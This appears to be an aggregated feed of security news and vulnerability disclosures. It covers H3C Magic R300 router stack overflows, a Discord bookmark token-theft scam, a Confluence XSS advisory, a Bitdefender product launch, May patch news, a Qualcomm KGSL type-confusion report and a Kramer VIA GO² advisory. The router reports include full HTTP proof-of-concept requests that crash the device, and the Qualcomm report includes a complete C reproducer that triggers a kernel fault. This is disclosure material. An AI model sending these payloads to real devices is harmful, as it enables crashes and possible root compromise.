H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the EditvsList interface at /goform/aspForm.

\# H3C Magic R300-2100M was discovered stack overflow via the EditvsList interface at /goform/aspForm ###### tags: \`H3C\` \`Magic R300-2100M\` vendor:H3C product:Magic R300-2100M version:R300-2100MV100R004 type:Stack Overflow author:Yifeng Li，Wolin Zhuang; ## Vulnerability Description H3C Magic R300-2100M firmware version R300-2100MV100R004 was discovered to contain a stack overflow via the EditvsList interface at /goform/aspForm. ## Vulnerability Details In function EditvsList(sub\_461110),the size of local variable v8 is noly 20 bytes long.Parameters in the EditvsList interface use the getElement function to split strings(Var). !\[\](https://i.imgur.com/EDd6YXO.png) !\[\](https://i.imgur.com/XbagQem.png) The maximum size in the getElement function is limited to 64. The size of the original array has been completely exceeded, resulting in a buffer overflow vulnerability. !\[\](https://i.imgur.com/9e8xgUd.png) ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router Magic\_R300-2100M to newest firmware(we have a physical machine) 2. Login to 192.168.124.1 as admin 3. Attack with the following POC !\[\](https://i.imgur.com/PpMbygV.png) !\[\](https://i.imgur.com/0cGTbgK.png) \`\`\` POST /goform/aspForm HTTP/1.1 Host: 192.168.124.1 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.124.1/mobile.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG= Connection: close Content-Length: 2032 CMD=EditvsList&param=;;;;;;;;aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa; \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to the crash of webs progress. !\[\](https://i.imgur.com/oOVNgxA.png) And you can write your own exp to get the root shell.

CVE-2023-33630: H3C Magic R300-2100M was discovered stack overflow via the EditvsList interface at /goform/aspForm - HackMD

H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the UpdateWanParams interface at /goform/aspForm.

\# H3C Magic R300-2100M was discovered stack overflow via the UpdateWanParams interface at /goform/aspForm ###### tags: \`H3C\` \`Magic R300-2100M\` vendor:H3C product:Magic R300-2100M version:R300-2100MV100R004 type:Stack Overflow author:Yifeng Li，Wolin Zhuang; ## Vulnerability Description H3C Magic R300-2100M firmware version R300-2100MV100R004 was discovered to contain a stack overflow via the UpdateWanParams interface at /goform/aspForm. ## Vulnerability Details In the UpdateWanParams function, variable v27 is 64 bytes long. !\[\](https://i.imgur.com/WDK3g9I.png) !\[\](https://i.imgur.com/q54GVPx.png) V24 can be controlled by attacker, entered as parameter 'param'. !\[\](https://i.imgur.com/RYbrKEX.png) In line 55, v24 is formatted into v27 by function sscanf as long as the size of the data we enter is less than 512 bytes. So when the size of the data we enter is larger than the size of V27 and less than 512 bytes, it will cause a stack overflow. ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router Magic\_R300-2100M to newest firmware(we have a physical machine) 2. Login to 192.168.124.1 as admin 3. Attack with the following POC !\[\](https://i.imgur.com/PpMbygV.png) !\[\](https://i.imgur.com/qRxLceC.png) \`\`\` POST /goform/aspForm HTTP/1.1 Host: 192.168.124.1 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.124.1/mobile.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG=; UPGRADE\_SOURCE= Connection: close Content-Length: 536 CMD=UpdateMacClone&param=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA; \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to the crash of webs progress. !\[\](https://i.imgur.com/x0dsbUP.png) And you can write your own exp to get the root shell.

CVE-2023-33633: H3C Magic R300-2100M was discovered stack overflow via the UpdateWanParams interface at /goform/aspForm - HackMD

By Waqas
Discord admins, beware: scammers are hijacking accounts and stealing cryptocurrency funds by using malicious bookmarks in a new and tricky attack.
This is a post from HackRead.com Read the original post: Crypto Discord Communities Targeted by Malicious Bookmarks & JavaScript

Several crypto-based Discord communities, including Aura Network, MetrixCoin, and Nahmii, have already fallen victim to the attack.

Discord communities have become prime targets for cybercriminals, with frequent attacks being reported on this platform. In a recent wave of attacks, several crypto-based Discord communities, including Aura Network, MetrixCoin, and Nahmii, have fallen victim.

While hackers typically **target Discord communities focused on cryptocurrency** discussions, this time they are specifically targeting admin accounts belonging to these groups.

**Attack Method:**

According to Brian Krebs from KrebsOnSecurity, there has been a significant increase in attacks aimed at compromising admin accounts on Discord. Attackers are attempting to exploit these accounts by executing **malicious JavaScript code**. To trick users into executing the code, it is disguised as a seemingly harmless browser bookmark. A YouTube video has been released to demonstrate how this attack unfolds.

**Deceptive Strategy:**

The attackers employ a deceptive strategy by inserting JavaScript into browser bookmarks using the dragging feature on web pages. Discord admins have reported receiving interview requests from individuals posing as reporters from crypto-news outlets.

Once they agree to the interview, the admins are redirected to a fake Discord server that mimics the news outlet. They are then asked to verify their identity by dragging a button from the server to their browser’s bookmarks bar. The victims believe this action is part of the verification process and subsequently return to Discord.com and click on the new bookmark.

**Malicious JavaScript Snippet:**

Unbeknownst to the victims, the bookmark is a cleverly designed JavaScript snippet. This snippet covertly extracts the victim’s Discord token and sends it to the attacker’s website.

The attacker then loads the token into their browser session and proceeds to announce late-night exclusive airdrops or **NFT** mint events within the targeted Discord group. These announcements are intended to lure innocent members, who trust the legitimacy of the messages.

Victims are then instructed to connect their **crypto wallets to a web address** provided by the attacker and grant unlimited spend approvals on their tokens. Consequently, the attacker successfully drains funds from these compromised accounts. To cover their tracks, the attacker promptly deletes the messages and bans users who attempt to expose the scam.

**Token Functionality and Aftermath:**

The stolen token remains functional exclusively for the attacker until the original owner either log out or changes their credentials. This ensures that the attacker can exploit the hijacked account without arousing suspicion.

According to Krebs’ **blog post**, Nicholas Scavuzzo, an associate of Ocean Protocol, fell victim to this attack. On May 22, the admin of Ocean Protocol’s Discord server clicked on a link sent via direct message from a community member. The admin was then asked to verify their identity by dragging a link to their web browser’s bookmarks bar. Despite having **enabled multi-factor authentication** (MFA), Scavuzzo’s account was hijacked.

The attackers waited until midnight in Scavuzzo’s timezone to use the account, reducing the chances of immediate suspicion. They subsequently sent an unauthorized message announcing a new Ocean airdrop. Eventually, Scavuzzo contacted the server’s operator who hosted the channel, and the settings were reverted to normal.

**Conclusion:**

Discord admin accounts within crypto-focused communities have become prime targets for scammers utilizing malicious JavaScript bookmarks. The attackers exploit the trust of Discord admins by tricking them into executing the code disguised as innocent browser bookmarks.

Through this deceptive strategy, the scammers gain access to the victims’ Discord tokens, enabling them to carry out fraudulent activities, such as draining funds from compromised accounts. It is crucial for Discord users, especially admins, to exercise caution and be vigilant against such attacks.

**RELATED ARTICLES**

1.  New malware targets Discord users to steal personal data
2.  Teen “Hackers” on Discord Selling Malware for Quick Cash
3.  Google Ads Malware Wipes NFT Influencer’s Crypto Wallet
4.  Gaming Firms, Community Members Hit by Dark Frost Botnet
5.  Malicious npm Packages Used in Siphoning Off Discord Tokens

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Crypto Discord Communities Targeted by Malicious Bookmarks & JavaScript

A stored cross-site scripting (XSS) vulnerability in the Inline Table Editing application before 3.8.0 for Confluence allows attackers to store and execute arbitrary JavaScript via a crafted payload injected into the tables.

As we continue to move towards a cloud future together, new server app sales and installs are no longer available for customers. You can update app version via Atlassian Marketplace until the end of support for server on Feb 15, 2024. Learn more

Overview

Reviews

Pricing

Support

Versions

**Boost your Confluence tables: edit them in view mode, use Excel-like functions, benefit from great filter and sorting options**

**Quick changes in view mode**

You know the problem: Small changes in long tables require many clicks. Switching between modes is very time-consuming. Use our solution and save time - every time! Change table cells quickly with a simple double-click.

**Excel-like operators**

**Reorder and filter your table data**

Our macro allows you to change the order of the table rows with using drag and drop. Moving multiple rows can also be done quickly. Even complex filtering according to individual wishes is child's play in the view mode.

**More details**

▶️ Watch product video 💻 Book a 1on1 demo 📧 Contact our support

“Inline Table Editing” is a versatile tool that immensely optimizes the work with Confluence tables due to its intuitive handling, enormous time saving and plenty of functions.

Your advantages

*   Edit tables in view mode
    *   Directly change the content of a Confluence table without switching to edit mode
*   Bring in some color
    *   Change the background colors of table cells directly within view mode
*   Macro support and rich text
    *   The most popular Confluence macros like status, date, Jira, or mention can be inserted into the table.
    *   We also support rich text format for the headings!
*   Advanced filtering options
    *   Easily find what you’ve been looking for with flexible predefined column filters
*   Autofill in all directions
*   More than 300 built-in functions for math, logical and more
*   Direct import from Excel
    *   Just one click, and you can import your Excel and Google Sheets without losing any formulas!
*   In continuous development

**Gallery**

Zero Data Retention: We don't save any of your data

CVE-2023-33287: Inline Table Editing | Atlassian Marketplace

By Habiba Rashid
According to Bitdefender, GravityZone Security for Mobile is a cutting-edge solution that leverages powerful antimalware technologies driven by real-time threat intelligence and machine learning.
This is a post from HackRead.com Read the original post: Bitdefender Introduces GravityZone Security for Android, iOS, and Chromebook

Bitdefender has launched GravityZone Security for Mobile, a next-generation mobile security solution designed to provide organizations with advanced Mobile Threat Detection (MTD) and robust security measures for Android, iOS, and Chromebook devices.

From communication and banking to entertainment and productivity, smartphones have become integral to our daily lives. However, this increasing reliance on mobile devices has also made them lucrative targets for cybercriminals.

According to the 2023 “Market Guide for Mobile Threat Defense” report by Gartner®, recent cyber attacks have shown the involvement of mobile devices at various stages, emphasizing the critical need for advanced mobile threat detection solutions.

**Bitdefender Introduces GravityZone Security**

Bitdefender’s GravityZone Security for Mobile is a cutting-edge solution that leverages powerful antimalware technologies driven by real-time threat intelligence and machine learning.

This unique combination enables the detection and mitigation of both known and unknown mobile threats. By providing application vetting, device status monitoring, and protection against malicious apps and phishing attacks, GravityZone Security for Mobile significantly enhances the overall security posture of mobile devices.

**Proactively Defending Against Network-Based Threats**

One major vulnerability faced by mobile phones is network-based threats. GravityZone Security for Mobile helps organizations detect and respond to these threats, including reconnaissance attempts and man-in-the-middle attacks. By mapping tactics and techniques used in security evaluations, this solution offers a proactive defence against sophisticated attacks specifically targeted at the mobile channel.

**Comprehensive Device Assessments for Strengthening Mobile Security**

Mobile device vulnerabilities pose significant risks to organizations. GravityZone Security for Mobile conducts comprehensive device assessments, monitoring for missing encryption, jailbreaking, root access, and outdated devices. This proactive approach enables organizations to identify and address vulnerabilities promptly, bolstering their mobile security.

**Seamless Integration and Centralized Management**

Integration with existing security solutions is vital for comprehensive protection. GravityZone Security for Mobile seamlessly integrates with the unified Bitdefender GravityZone console, allowing organizations to manage mobile security alongside other endpoint security solutions. This integration extends security beyond traditional endpoints, simplifying the overall security infrastructure and enabling centralized management.

**Cloud-Based and User-Friendly Approach**

With a cloud-based and user-friendly approach, GravityZone Security for Mobile ensures easy deployment and management for organizations with mobile workforces. Its zero-touch enrollment feature streamlines mass deployments of mobile devices, enhancing security without burdening end-users.

**Meeting Regulatory Compliance Standards**

Regulatory compliance is a top concern for organizations in regulated industries. GravityZone Security for Mobile provides real-time visibility, enabling application vetting, detecting abnormal app behaviour, and enforcing application version control. By facilitating user warnings, isolating risky applications, and taking necessary actions, organizations can meet privacy and security standards more effectively.

**Conclusion:**

As the mobile threat landscape continues to evolve, organizations must enhance their mobile phone security. Bitdefender’s GravityZone Security for Mobile offers a comprehensive solution that effectively tackles mobile threats head-on.

By leveraging advanced technology, proactive defense mechanisms, and seamless integration, organizations can ensure the security and privacy of their mobile devices, safeguarding their operations from evolving cyber threats.

**RELATED ARTICLES**

1.  Ankr Launches Chainscanner Blockchain Explorer Tool
2.  Memcyco Introduces Real-Time Solution to Combat Brandjacking
3.  Mobile Security Firm Cirotta Launches Anti-Hacking Phone Cases
4.  ProtonVPN launches extensions for Chrome and Firefox browsers
5.  Microsoft launches Linux memory forensics tool to detect malware

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

Bitdefender Introduces GravityZone Security for Android, iOS, and Chromebook

Plus: Microsoft patches two zero-day flaws, Google’s Android and Chrome get some much-needed updates, and more.

Apple, Google, and Microsoft have released major patches this month to fix multiple security flaws already being used in attacks. May was also a critical month for enterprise software, with GitLab, SAP, and Cisco releasing fixes for multiple bugs in their products.

Here’s everything you need to know about the security updates released in May.

Apple iOS and iPadOS 16.5

Apple has released its long-awaited point update iOS 16.5, addressing 39 issues, three of which are already being exploited in real-life attacks. The iOS upgrade patches vulnerabilities in the Kernel at the heart of the operating system and in WebKit, the engine that powers the Safari browser. The three already exploited flaws are among five fixed in WebKit—tracked as CVE-2023-32409, CVE-2023-28204, and CVE-2023-32373.

CVE-2023-32409 is an issue that could allow an attacker to break out of the Web Content sandbox remotely, reported by Clément Lecigne of Google's Threat Analysis Group and Donncha Ó Cearbhaill of Amnesty International’s Security Lab. CVE-2023-28204 is a flaw that risks a user disclosing sensitive information. Finally, CVE-2023-32373 is a use-after-free bug that could enable arbitrary code execution.

Earlier in the month, Apple released iOS 16.4.1 (a) and iPadOS 16.4.1 (a)—the iPhone maker’s first-ever Rapid Security Response update—fixing the latter two exploited WebKit vulnerabilities also patched in iOS 16.5.

Apple iOS and iPadOS 16.5 were issued alongside iOS 15.7.6 and iPadOS 15.7.6 for older iPhones, as well as iTunes 12.12.9 for Windows, Safari 16.5, macOS Big Sur 11.7.7, macOS Ventura 13.4, and macOS Monterey 12.6.6.

Apple also released its first security update for Beats and AirPods headphones.

Microsoft

Microsoft’s mid-month Patch Tuesday fixed 40 security issues, two of which were zero-day flaws already being used in attacks. The first zero-day vulnerability, CVE-2023-29336, is an elevation-of-privilege bug in the Win32k driver that could allow an attacker to gain System privileges.

The second serious flaw, CVE-2023-24932, is a Secure Boot security feature bypass issue that could allow a privileged attacker to execute code. “An attacker who successfully exploited this vulnerability could bypass Secure Boot,” Microsoft said, adding that the flaw is difficult to exploit: “Successful exploitation of this vulnerability requires an attacker to compromise admin credentials on the device.”

The security update is not a full fix: It addresses the vulnerability by updating the Windows Boot Manager, which could cause issues, the company warned. Additional steps are required at this time to mitigate the vulnerability, Microsoft said, pointing to steps affected users can take to mitigate the issue.

Google Android

Google has released its latest Android security patches, fixing 40 flaws, including an already exploited Kernel vulnerability. The updates also include fixes for issues in the Android Framework, System, Kernel, MediaTek, Unisoc, and Qualcomm components.

The most severe of these issues is a high-severity security vulnerability in the Framework component that could lead to local escalation of privilege, Google said, adding that user interaction is needed for exploitation.

Previously linked to commercial spyware vendors, CVE-2023-0266 is a Kernel issue that could lead to local escalation of privilege. User interaction is not needed for exploitation.

Apple's iOS 16.5 Fixes 3 Security Bugs Already Used in Attacks

Qualcomm Adreno/KGSL suffers from an unchecked cast of vma->vm_file->private_data in kgsl_setup_dmabuf_useraddr().

    Qualcomm Adreno/KGSL: unchecked cast of vma->vm_file->private_data in kgsl_setup_dmabuf_useraddr()[Tested on a Pixel 4 (flame), on the latest update from 2023-02, which self-reports as SPL 2022-10-05, since I don't yet have any newer device with KGSL here - but as far as I can tell from the sources, it should also affect current versions.]The following bug was apparently introduced in https://git.codelinaro.org/clo/la/kernel/msm-3.18/-/commit/7ada2c15e39e5288b67ed5ae94b0a8dcb181b911 as part of the fix for CVE-2022-25743.In drivers/gpu/msm/kgsl.c (on the msm/android-msm-redbull-4.19-android13-qpr1 branch of https://android.googlesource.com/kernel/msm), kgsl_setup_dmabuf_useraddr() (reachable via IOCTL_KGSL_MAP_USER_MEM with KGSL_USER_MEM_TYPE_ADDR) does the following: - look up a VMA by user-specified address (find_vma()) - check that the VMA is not anonymous (vma->vm_file) - check that the VMA does *NOT* belong to KGSL - cast the vma->vm_file->private_data to a "struct dma_buf" [bogus cast]This type-confused pointer is then passed down to kgsl_setup_dma_buf(), which passes it to dma_buf_attach(), which accesses fields through the type-confused pointer.Here's a simple reproducer that confuses "struct dma_buf" with "struct binder_proc" - build it like "aarch64-linux-gnu-gcc -static -o kgsl-vma-type-confusion kgsl-vma-type-confusion.c":#define _GNU_SOURCE#include <err.h>#include <fcntl.h>#include <stdlib.h>#include <sys/ioctl.h>#include <sys/mman.h>#define SYSCHK(x) ({          \  typeof(x) __res = (x);      \  if (__res == (typeof(x))-1) \    err(1, "SYSCHK(" #x ")"); \  __res;                      \})typedef unsigned long binder_size_t;typedef unsigned long binder_uintptr_t;enum binder_driver_command_protocol {  BC_INCREFS = _IOW('c', 4, unsigned int),};struct binder_write_read {binder_size_t write_size; /* bytes to write */binder_size_t write_consumed; /* bytes consumed by driver */binder_uintptr_t write_buffer;binder_size_t read_size; /* bytes to read */binder_size_t read_consumed; /* bytes consumed by driver */binder_uintptr_t read_buffer;};#define BINDER_WRITE_READ _IOWR('b', 1, struct binder_write_read)#define KGSL_IOC_TYPE 0x09enum kgsl_user_mem_type {KGSL_USER_MEM_TYPE_PMEM = 0x00000000,KGSL_USER_MEM_TYPE_ASHMEM = 0x00000001,KGSL_USER_MEM_TYPE_ADDR = 0x00000002,KGSL_USER_MEM_TYPE_ION = 0x00000003,KGSL_USER_MEM_TYPE_DMABUF       = 0x00000003,KGSL_USER_MEM_TYPE_MAX = 0x00000007,};#define KGSL_MEMFLAGS_GPUREADONLY 0x01000000Ustruct kgsl_map_user_mem {int fd;unsigned long gpuaddr;   /*output param */size_t len;size_t offset;unsigned long hostptr;   /*input param */enum kgsl_user_mem_type memtype;unsigned int flags;};#define IOCTL_KGSL_MAP_USER_MEM \_IOWR(KGSL_IOC_TYPE, 0x15, struct kgsl_map_user_mem)int main(void) {  /*   * set up binder a little bit so that its private data isn't full of null   * bytes   */  int binder_fd = SYSCHK(open("/dev/binder", O_RDWR));  unsigned int write_buffer[2] = {    BC_INCREFS, // cmd    0, // target  };  struct binder_write_read arg_bwr = {    .write_size = sizeof(write_buffer),    .write_buffer = (unsigned long)write_buffer  };  SYSCHK(ioctl(binder_fd, BINDER_WRITE_READ, &arg_bwr));  char *binder_vma = SYSCHK(mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, binder_fd, 0));  int kgsl_fd = SYSCHK(open("/dev/kgsl-3d0", O_RDWR));  struct kgsl_map_user_mem arg_mum = {    .len = 0x1001,    .offset = 0,    .hostptr = (unsigned long)binder_vma,    .memtype = KGSL_USER_MEM_TYPE_ADDR,    .flags = KGSL_MEMFLAGS_GPUREADONLY  };  SYSCHK(ioctl(kgsl_fd, IOCTL_KGSL_MAP_USER_MEM, &arg_mum));}When you run this on a Pixel 4, you'll get a splat like this:[   45.744676] Unexpected kernel BRK exception at EL1[   45.744689] Unhandled debug exception: ptrace BRK handler (0xf2005512) at 0xffffff95081fd358[   45.744695] Internal error: : 0 [#1] PREEMPT SMP[   45.744700] Modules linked in: ftm5(O) heatmap videobuf2_vmalloc videobuf2_memops lkdtm adsp_loader_dlkm stub_dlkm usf_dlkm native_dlkm machine_dlkm platform_dlkm wcd_cpe_dlkm wsa881x_dlkm wcd934x_dlkm wcd9360_dlkm mbhc_dlkm wcd9xxx_dlkm swr_ctrl_dlkm cs35l36_dlkm q6_dlkm swr_dlkm apr_dlkm q6_notifier_dlkm q6_pdr_dlkm wglink_dlkm wcd_spi_dlkm wcd_core_dlkm pinctrl_wcd_dlkm msm_11ad_proxy wlan(O) incrementalfs[   45.744735] Process kgsl-vma-type-c (pid: 7371, stack limit = 0x0000000017bcb360)[   45.744741] CPU: 6 PID: 7371 Comm: kgsl-vma-type-c Tainted: G S      W  O    4.14.276-g6ef255005cea-ab9062920 #1[   45.744744] Hardware name: Qualcomm Technologies, Inc. SM8150 V2 PM8150 Google Inc. MSM sm8150 Flame (DT)[   45.744748] task: 000000004f4f2973 task.stack: 0000000017bcb360[   45.744762] pc : osq_lock+0x17c/0x180[   45.744772] lr : __mutex_lock+0x134/0x7d8[   45.744776] sp : ffffff802681bab0 pstate : a0400145[   45.744779] x29: ffffff802681baf0 x28: ffffffdb21200da8[   45.744783] x27: ffffffdaa65e9800 x26: ffffffdaad722c00[   45.744786] x25: ffffff950aa8d000 x24: 000000000013a934[   45.744790] x23: ffffffdac40fda48 x22: ffffffdb6ac56c34[   45.744794] x21: 0000000000000002 x20: ffffffdb6ac56c28[   45.744797] x19: ffffffdac40fda00 x18: ffffffdab6d89458[   45.744801] x17: 0000000000000000 x16: ffffff9508095b90[   45.744805] x15: 0000000000000000 x14: 0000000000000070[   45.744809] x13: 0000000000000007 x12: 00000000ffffffda[   45.744812] x11: ffffff950a6a3028 x10: ffffff950a6aed80[   45.744816] x9 : ffffffdbffbb3d80 x8 : 0000000000000000[   45.744820] x7 : 0000000000000000 x6 : 000000000000003f[   45.744824] x5 : 0000000000000040 x4 : 0000000000000000[   45.744828] x3 : 0000000000000004 x2 : ffffffdac40fda00[   45.744831] x1 : 0000000000000002 x0 : ffffffdb6ac56c34[   45.744837] \x0aPC: osq_lock+0x13c/0x180:[   45.744840] d318  540001c0 f940012d b4fffead aa1f03ee f8ee812d d503201f d503201f d503201f[   45.744848] d338  d503201f b4fffdcd 2a1f03e0 f90005ac f900014d 17ffffdb 2a1f03e0 17ffffd9[   45.744855] d358  d42aa240 f800865e f81f0ffe d001252b d538d088 9100a16b b86b6908 aa1f03e2[   45.744862] d378  11000509 93407d21 aa0003e8 2a0103fe 88befc02 2a1e03e0 6b00013f 54000081[   45.744870] \x0aLR: __mutex_lock+0xf4/0x7d8:[   45.744874] 8b94  b9045a68 35000196 14000030 b9445a68 71000508 540000e1 52b00008 b9045a68[   45.744881] 8bb4  b9445e68 350031a8 b9045a7f 14000002 b9045a68 91003296 aa1603e0 97939183[   45.744888] 8bd4  36000440 f9400281 f27df028 540000c0 eb13011f 540001e1 361001c1 92400428[   45.744895] 8bf4  14000002 92400828 927ef908 aa1403e0 aa130102 aa0103fe c8fe7e82 aa1e03e0[   45.744905] \x0aSP: 0xffffff802681ba70:[   45.744908] ba70  081fd358 ffffff95 a0400145 00000000 00000000 00000000 d0608d00 c7188d35[   45.744916] ba90  ffffffff 0000007f 08c74984 ffffff95 2681baf0 ffffff80 081fd358 ffffff95[   45.744923] bab0  09d18bd4 ffffff95 0841e720 ffffff95 2681bb30 ffffff80 00000000 00000000[   45.744930] bad0  00000000 00000000 00000000 00000000 00000000 00000000 d0608d00 c7188d35[   45.744936][   45.744940] Call trace:[   45.744943] osq_lock+0x17c/0x180[   45.744947] __mutex_lock_slowpath+0x14/0x20[   45.744954] dma_buf_attach+0x78/0x1cc[   45.744960] kgsl_setup_dma_buf+0x5c/0x580[   45.744964] kgsl_setup_useraddr+0x118/0x89c[   45.744968] kgsl_ioctl_map_user_mem+0x210/0x73c[   45.744973] kgsl_ioctl_helper+0x13c/0x194[   45.744977] kgsl_ioctl+0x34/0xf0[   45.744982] do_vfs_ioctl+0x938/0xf3c[   45.744986] SyS_ioctl+0x138/0x16c[   45.744992] el0_svc_naked+0x34/0x38[   45.744997] Code: f900014d 17ffffdb 2a1f03e0 17ffffd9 (d42aa240)[   45.745002] ---[ end trace b07b8661a56776c3 ]---As you can see, dma_buf_attach() is trying to call mutex_lock(&dmabuf->lock) on the type-confused dmabuf pointer, which crashes the mutex implementation.This bug is subject to a 90-day disclosure deadline. If a fix for thisissue is made available to users before the end of the 90-day deadline,this bug report will become public 30 days after the fix was madeavailable. Otherwise, this bug report will become public at the deadline.The scheduled deadline is 2023-05-09This is QPSIIR-1788."This is A-271879598.bulletin entry:https://source.android.com/docs/security/bulletin/2023-05-01#qualcomm-componentsfix commit:https://git.codelinaro.org/clo/la/kernel/msm-4.19/-/commit/86695e1dd101e71571998281541b0b4378f89414Related CVE Numbers: CVE-2022-25743,CVE-2023-21665.Found by: jannh@google.com

Qualcomm Adreno/KGSL Unchecked Cast / Type Confusion

KramerAV VIA GO² < 4.0.1.1326 is vulnerable to Unauthenticated arbitrary file read.

**Introduction**

Kramer VIA GO² devices were vulnerable to multiple issues, including:

*   Unauthenticated arbitrary file read (CVE-2023-33507)
*   Unauthenticated SQLi (Squeely) (CVE-2023-33509)
*   Unauthenticated file upload resulting in RCE (CVE-2023-33508)

By chaining with previously discovered privilege escalation through misconfigured Sudo rules (CVE-2021-35064), it was possible to completely take over a device from an unauthenticated standpoint.

